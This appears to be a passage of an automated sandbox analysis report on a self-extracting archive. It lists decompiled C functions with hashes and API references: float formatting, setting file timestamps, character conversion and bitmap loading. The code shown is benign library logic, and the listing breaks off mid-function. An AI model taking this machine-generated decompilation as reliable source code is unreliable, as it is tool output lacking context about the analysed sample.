sfxpar, xrefs: 001AC8DE

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 5ef06855962b962f08b8d839d65f2d59ae6a7bb0b1e02a61b82fbbb71948969f
Instruction ID: 424df4914bd5e76099f71d044a1b3e66ab4269cdf28ba7fcb172c749292a8312
Opcode Fuzzy Hash: 5ef06855962b962f08b8d839d65f2d59ae6a7bb0b1e02a61b82fbbb71948969f
Instruction Fuzzy Hash: CAF0A7B6800225B7DB202FD19C09FBA7B6CEF25B51B04406AFD4996152DB74C841D7F1

Uniqueness

Uniqueness Score: -1.00%

Function 001B8749, Relevance: 6.3, APIs: 4, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E001B8749(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E001B3356(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E001ADAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E001ADAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0x1b3fc1
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E001AE920(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E001ADAC0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E001ADE00();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E001ADE00();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E001ADE00();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E001B8A4C(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E001C0FD0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E001B7ECC();
					_t183 = 0x22;
					 *_t129 = _t183;
					E001B7DAB();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x001b8749
0x001b8754
0x001b875b
0x001b875d
0x001b875d
0x001b875f
0x001b8768
0x001b876a
0x001b876f
0x001b8775
0x001b878b
0x001b8790
0x001b8793
0x001b87a0
0x001b87a5
0x001b87f9
0x001b8801
0x001b8803
0x001b8805
0x001b8808
0x001b8808
0x001b8808
0x001b880e
0x001b8816
0x001b8829
0x001b882c
0x001b882e
0x001b8831
0x001b8832
0x001b8853
0x001b8856
0x001b8856
0x001b8834
0x001b8834
0x001b8836
0x001b8841
0x001b8841
0x001b8843
0x001b884a
0x001b8845
0x001b8845
0x001b8845
0x001b8843
0x001b8857
0x001b8859
0x001b885a
0x001b885d
0x001b885f
0x001b8873
0x001b8861
0x001b8861
0x001b8861
0x001b8878
0x001b8878
0x001b887d
0x001b8880
0x001b888b
0x001b888b
0x001b888b
0x001b888b
0x001b888f
0x001b8896
0x001b8897
0x001b889a
0x001b889d
0x001b889d
0x001b889f
0x00000000
0x00000000
0x001b88b7
0x001b88be
0x001b88c2
0x001b88c5
0x001b88c8
0x001b88ca
0x001b88ca
0x001b88ca
0x001b88cc
0x001b88cf
0x001b88d2
0x001b88d4
0x001b88dc
0x001b88e2
0x001b88e5
0x001b88e8
0x001b88e9
0x001b88ec
0x001b88ef
0x001b88ef
0x001b88f4
0x001b88f7
0x00000000
0x00000000
0x001b890f
0x001b8914
0x001b8918
0x00000000
0x00000000
0x001b891c
0x001b891c
0x001b891f
0x001b8920
0x001b8920
0x001b8922
0x001b8925
0x00000000
0x00000000
0x001b8927
0x001b892a
0x001b8931
0x001b8934
0x001b8937
0x001b894d
0x001b894d
0x001b894d
0x001b8939
0x001b8939
0x001b893b
0x001b893e
0x001b8949
0x001b8940
0x001b8943
0x001b8943
0x001b893e
0x00000000
0x001b8937
0x001b892c
0x001b892c
0x001b892e
0x001b892e
0x001b8882
0x001b8882
0x001b8885
0x001b8950
0x001b8950
0x001b8952
0x001b8954
0x001b8957
0x001b8958
0x001b8959
0x001b895a
0x001b8962
0x001b8962
0x001b8962
0x001b8964
0x001b8967
0x001b896a
0x001b896c
0x001b896c
0x001b896e
0x001b8980
0x001b8984
0x001b8987
0x001b898e
0x001b8996
0x001b8996
0x001b8999
0x001b899b
0x001b89ac
0x001b89ac
0x001b89b0
0x001b89b0
0x001b89b3
0x001b89b5
0x001b89b8
0x00000000
0x001b899d
0x001b899d
0x001b89a3
0x001b89a3
0x001b89a7
0x001b89ba
0x001b89ba
0x001b89be
0x001b89bf
0x001b89c1
0x001b89c3
0x001b8a04
0x001b8a04
0x001b8a06
0x001b8a13
0x001b8a13
0x001b8a15
0x001b8a17
0x001b8a18
0x001b8a19
0x001b8a20
0x001b8a23
0x001b8a25
0x001b8a25
0x001b8a26
0x001b8a28
0x001b8a2b
0x001b8a2b
0x001b8a2d
0x001b8a2f
0x00000000
0x001b8a2f
0x001b8a08
0x001b8a0a
0x00000000
0x00000000
0x001b8a0c
0x00000000
0x00000000
0x001b8a0e
0x001b8a11
0x00000000
0x00000000
0x00000000
0x001b8a11
0x001b89ca
0x001b89d0
0x001b89d0
0x001b89d2
0x001b89d3
0x001b89d4
0x001b89d5
0x001b89dc
0x001b89df
0x001b89e1
0x001b89e2
0x001b89e4
0x001b89f1
0x001b89f1
0x001b89f3
0x001b89f5
0x001b89f6
0x001b89f7
0x001b89fe
0x001b8a01
0x001b8a03
0x001b8a03
0x00000000
0x001b8a03
0x001b89e6
0x001b89e6
0x001b89e8
0x00000000
0x00000000
0x001b89ea
0x00000000
0x00000000
0x001b89ec
0x001b89ef
0x00000000
0x00000000
0x00000000
0x001b89ef
0x001b89cc
0x001b89ce
0x00000000
0x00000000
0x00000000
0x001b89ce
0x001b899f
0x001b89a1
0x00000000
0x00000000
0x00000000
0x001b89a1
0x001b899b
0x00000000
0x001b8885
0x001b8880
0x001b87a7
0x001b87a9
0x00000000
0x001b87ab
0x001b87c1
0x001b87c6
0x001b87c8
0x001b87d4
0x001b87da
0x001b87db
0x001b87dd
0x001b87df
0x001b87ea
0x001b87ea
0x001b87ed
0x001b87ef
0x001b87ef
0x001b87f2
0x001b87ca
0x001b87ca
0x001b87ca
0x00000000
0x001b87c8
0x001b8777
0x001b8777
0x001b877e
0x001b877f
0x001b8781
0x001b8a33
0x001b8a37
0x001b8a3c
0x001b8a3c
0x001b8a4b
0x001b8a4b

APIs

_strrchr.LIBCMT ref: 001B87D4
__alldvrm.LIBCMT ref: 001B89D5
__alldvrm.LIBCMT ref: 001B89F7

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
Instruction ID: 7345a71d7d7c5654371964df2c910d91d63ca1eba784b2c8dec9453824bcaa8c
Opcode Fuzzy Hash: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
Instruction Fuzzy Hash: 07A1AB319043869FEB25CF28C8817FEBBE8EF65714F28016EE4959B281CB348D41C751

Uniqueness

Uniqueness Score: -1.00%

Function 00199F96, Relevance: 6.1, APIs: 4, Instructions: 127
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00199F96(void* __edx) {
				signed char _t40;
				void* _t41;
				void* _t52;
				signed char _t70;
				void* _t79;
				signed int* _t81;
				signed int* _t84;
				void* _t85;
				signed int* _t88;
				void* _t90;

				_t79 = __edx;
				E001AD940();
				_t84 =  *(_t90 + 0x1038);
				_t70 = 1;
				if(_t84 == 0) {
					L2:
					 *(_t90 + 0x11) = 0;
					L3:
					_t81 =  *(_t90 + 0x1040);
					if(_t81 == 0) {
						L5:
						 *(_t90 + 0x13) = 0;
						L6:
						_t88 =  *(_t90 + 0x1044);
						if(_t88 == 0) {
							L8:
							 *(_t90 + 0x12) = 0;
							L9:
							_t40 = E00199E7F( *(_t90 + 0x1038));
							 *(_t90 + 0x18) = _t40;
							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
								_t70 = 0;
							} else {
								E0019A12F( *((intOrPtr*)(_t90 + 0x103c)), 0);
							}
							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t90 + 0x14) = _t41;
							if(_t41 != 0xffffffff) {
								L16:
								if( *(_t90 + 0x11) != 0) {
									E001A082F(_t84, _t79, _t90 + 0x1c);
								}
								if( *(_t90 + 0x13) != 0) {
									E001A082F(_t81, _t79, _t90 + 0x2c);
								}
								if( *(_t90 + 0x12) != 0) {
									E001A082F(_t88, _t79, _t90 + 0x24);
								}
								_t85 =  *(_t90 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
								_t52 = CloseHandle(_t85);
								if(_t70 != 0) {
									_t52 = E0019A12F( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
								}
								goto L24;
							} else {
								_t52 = E0019B32C( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
								if(_t52 == 0) {
									L24:
									return _t52;
								}
								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t90 + 0x14) = _t52;
								if(_t52 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t90 + 0x12) = _t70;
						if(( *_t88 | _t88[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t90 + 0x13) = _t70;
					if(( *_t81 | _t81[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t90 + 0x11) = 1;
				if(( *_t84 | _t84[1]) != 0) {
					goto L3;
				}
				goto L2;
			}

0x00199f96
0x00199f9b
0x00199fa7
0x00199fae
0x00199fb2
0x00199fbf
0x00199fbf
0x00199fc3
0x00199fc3
0x00199fcc
0x00199fd9
0x00199fd9
0x00199fdd
0x00199fdd
0x00199fe6
0x00199ff4
0x00199ff4
0x00199ff8
0x00199fff
0x0019a004
0x0019a00b
0x0019a021
0x0019a011
0x0019a01a
0x0019a01a
0x0019a03c
0x0019a042
0x0019a049
0x0019a093
0x0019a098
0x0019a0a1
0x0019a0a1
0x0019a0ab
0x0019a0b4
0x0019a0b4
0x0019a0be
0x0019a0c7
0x0019a0c7
0x0019a0d7
0x0019a0db
0x0019a0eb
0x0019a0fb
0x0019a101
0x0019a108
0x0019a110
0x0019a11d
0x0019a11d
0x00000000
0x0019a04b
0x0019a05c
0x0019a063
0x0019a122
0x0019a12c
0x0019a12c
0x0019a080
0x0019a086
0x0019a08d
0x00000000
0x00000000
0x00000000
0x0019a08d
0x0019a049
0x00199fee
0x00199ff2
0x00000000
0x00000000
0x00000000
0x00199ff2
0x00199fd3
0x00199fd7
0x00000000
0x00000000
0x00000000
0x00199fd7
0x00199fb9
0x00199fbd
0x00000000
0x00000000
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00197F2C,?,?,?), ref: 0019A03C
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00197F2C,?,?), ref: 0019A080
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00197F2C,?,?,?,?,?,?,?,?), ref: 0019A101
CloseHandle.KERNEL32(?,?,00000000,?,00197F2C,?,?,?,?,?,?,?,?,?,?,?), ref: 0019A108

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 29ce10831df6679c1501ad305a15ff02ce10fe8eac4791261795f017d3c66dd3
Instruction ID: 17e7558ac1f2b3d2cac30a8e1c07a904119f1c9123c36fb239da1fedec700df0
Opcode Fuzzy Hash: 29ce10831df6679c1501ad305a15ff02ce10fe8eac4791261795f017d3c66dd3
Instruction Fuzzy Hash: 3741CD706483819AEB21DE28DC45FAEBBE8AF95300F08091DB5E1D3181D774DA4CDB93

Uniqueness

Uniqueness Score: -1.00%

Function 001BB5EA, Relevance: 6.1, APIs: 4, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E001BB5EA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x1cd668; // 0x44aa1787
				_v8 = _t34 ^ _t70;
				E001B3356(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x31e85006
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E001AE203(_t67, _v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E001AE920(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E001B980D(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E001B7A8A(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E001C0EE0();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}

0x001bb5f2
0x001bb5f9
0x001bb605
0x001bb60a
0x001bb60f
0x001bb614
0x001bb614
0x001bb617
0x001bb619
0x001bb619
0x001bb61e
0x001bb637
0x001bb63d
0x001bb642
0x001bb6e1
0x001bb6e5
0x001bb6ea
0x001bb6ea
0x001bb706
0x001bb706
0x001bb648
0x001bb650
0x001bb654
0x001bb6a0
0x001bb6a2
0x001bb6a4
0x001bb6a9
0x001bb6c0
0x001bb6c8
0x001bb6d8
0x001bb6d8
0x001bb6c8
0x001bb6da
0x001bb6db
0x00000000
0x001bb6e0
0x001bb65b
0x001bb65d
0x001bb65f
0x001bb667
0x001bb684
0x001bb68e
0x001bb693
0x00000000
0x00000000
0x001bb695
0x001bb69b
0x001bb69b
0x00000000
0x001bb69b
0x001bb66b
0x001bb66f
0x001bb674
0x001bb678
0x00000000
0x00000000
0x001bb67a
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,31E85006,001B34E6,00000000,00000000,001B451B,?,001B451B,?,00000001,001B34E6,31E85006,00000001,001B451B,001B451B), ref: 001BB637
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001BB6C0
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 001BB6D2
__freea.LIBCMT ref: 001BB6DB

Part of subcall function 001B7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,001B2FA6,?,0000015D,?,?,?,?,001B4482,000000FF,00000000,?,?), ref: 001B7ABC

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: ce33ae772829079e99fa1c48ed1e1207f3ce319df2903055a84bc90ea74ab09e
Instruction ID: 7213f21a7edfe585d37df0b2bdb2783b5463a14100a8138cf85902071062a0b2
Opcode Fuzzy Hash: ce33ae772829079e99fa1c48ed1e1207f3ce319df2903055a84bc90ea74ab09e
Instruction Fuzzy Hash: 6C31ED72A0420AABDF248F65CC81EEF7BA5EB40310F194128FC14DB290EB75DD90CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001AA4F8, Relevance: 6.1, APIs: 4, Instructions: 55
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001AA4F8(void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t11;
				void* _t13;
				signed int _t18;
				signed int _t19;
				void* _t21;
				void* _t22;
				void* _t26;
				void* _t32;

				_t32 = __fp0;
				_t21 = __edx;
				_t22 = LoadBitmapW( *0x1d0060, 0x65);
				_t19 = _t18 & 0xffffff00 | _t22 == 0x00000000;
				_t28 = _t19;
				if(_t19 != 0) {
					_t22 = E001A963A(0x65);
				}
				GetObjectW(_t22, 0x18,  &_v28);
				if(E001A952A(_t28) != 0) {
					if(_t19 != 0) {
						_t26 = E001A963A(0x66);
						if(_t26 != 0) {
							DeleteObject(_t22);
							_t22 = _t26;
						}
					}
					_t11 = E001A958C(_v20);
					_t13 = E001A975D(_t21, _t32, _t22, E001A9549(_v24), _t11);
					DeleteObject(_t22);
					_t22 = _t13;
				}
				return _t22;
			}

0x001aa4f8
0x001aa4f8
0x001aa50e
0x001aa512
0x001aa515
0x001aa517
0x001aa520
0x001aa520
0x001aa529
0x001aa536
0x001aa541
0x001aa54a
0x001aa54e
0x001aa551
0x001aa553
0x001aa553
0x001aa54e
0x001aa558
0x001aa568
0x001aa570
0x001aa572
0x001aa574
0x001aa57c

APIs

LoadBitmapW.USER32(00000065), ref: 001AA508
GetObjectW.GDI32(00000000,00000018,?), ref: 001AA529
DeleteObject.GDI32(00000000), ref: 001AA551
DeleteObject.GDI32(00000000), ref: 001AA570

Part of subcall function 001A963A: FindResourceW.KERNEL32(00000066,PNG,?,?,001AA54A,00000066), ref: 001A964B
Part of subcall function 001A963A: SizeofResource.KERNEL32(00000000,77125B70,?,?,001AA54A,00000066), ref: 001A9663
Part of subcall function 001A963A: LoadResource.KERNEL32(00000000,?,?,001AA54A,00000066), ref: 001A9676
Part of subcall function 001A963A: LockResource.KERNEL32(00000000,?,?,001AA54A,00000066), ref: 001A9681

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID:
API String ID: 142272564-0
Opcode ID: bd2dc113d9e1f40836cb8b2567bb0b95e5e302a693ee3d92fb8179450135fe37
Instruction ID: db9cfb823c9bd6cc6b2a7515fba9bd2ba96512c6d9e7b6e7f4a948b4abad0f60
Opcode Fuzzy Hash: bd2dc113d9e1f40836cb8b2567bb0b95e5e302a693ee3d92fb8179450135fe37
Instruction Fuzzy Hash: E501F23AA4010527C71233789C46E7F7BAEAF97B51F480025BA00A7291DF228C4292A1

Uniqueness

Uniqueness Score: -1.00%

Function 001B1A89, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E001B1A89(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
